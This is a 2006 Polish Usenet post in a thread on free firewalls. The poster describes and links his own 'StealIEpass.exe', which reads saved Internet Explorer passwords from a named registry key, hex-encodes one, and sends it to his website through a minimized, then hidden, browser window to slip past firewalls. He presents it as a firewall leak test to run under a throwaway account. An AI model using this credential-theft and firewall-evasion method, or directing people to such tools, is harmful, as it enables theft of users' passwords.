Re: darmowy firewall

Autor: fijaksoft <fijaksoft_at_wytnijtobardzoproszeo2.pl>
Data: Thu 03 Aug 2006 - 10:29:56 MET DST

Piotr Krzyżański napisał(a):

> Użytkownik "fijaksoft" <fijaksoft@wytnijtobardzoproszeo2.pl> napisał w
> wiadomości news:eaq1mu$50b$6@news.onet.pl...

> Napisz - chętnie potestuję.
>
> Piciu
Cos machnalem, ale to nie jest fajne, bo chodzi o sam test. oczywiscie
to jest sam exek, nalezy kogos "zmusic" zeby to wykonal.
progam dziala tak:
odczytuje zapamietane hasla z IE, zapisane one sa w
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\SPW
jako dwordy o "dziwnych nazwach", bedzei wyslane pierwsze ktore zostanie
znalezione. jest to zamienione na ciag wartosci szesnastkowych,
odczytywana jest domyslna przegladarka (ona ma wykjscie na swiat).
odpalamy jej proces, nie jako ukryte okno bo niektre FW to probuja
obcianac, odpalamy zminimalizowane, a po malym czasie ukrywamy wszystkie
okna 'IEFrame' (InternetExplorer) ktore naleza do wywolanego procesu
Tak wiec jesli zostanie uzyte okno ktore juz bylo otwarte to moze sie
nie ukryc. Nie ukryja sie tez okna FireFoxa.
To ma byc test a nie pelnodzialajaca wersja.
soft mozna pobrac z

www.tychy.pl/fijak/prvfijaksoft/downloads/tools/StealIEpass.exe

Program sluzy do testu - wysylania hasel z IE na strone
www.fbreakwall.prv.pl !!!
Tylko do testow, jesli chcesz to wlaczaj na innym nowostworzonym
uzytkowniku gdzie testowo zapamietasz sobie haslo do strony ktore jest
nieprawidlowe!!!

*Nie odpowiadam za ew. glupote i ew. wylslanie swoich hasle do mnie!!!*

dodatkowo do konwersji hex na str
www.tychy.pl/fijak/prvfijaksoft/downloads/tools/SIntoHex.exe

--
(*        www.fijaksoft.prv.pl      *)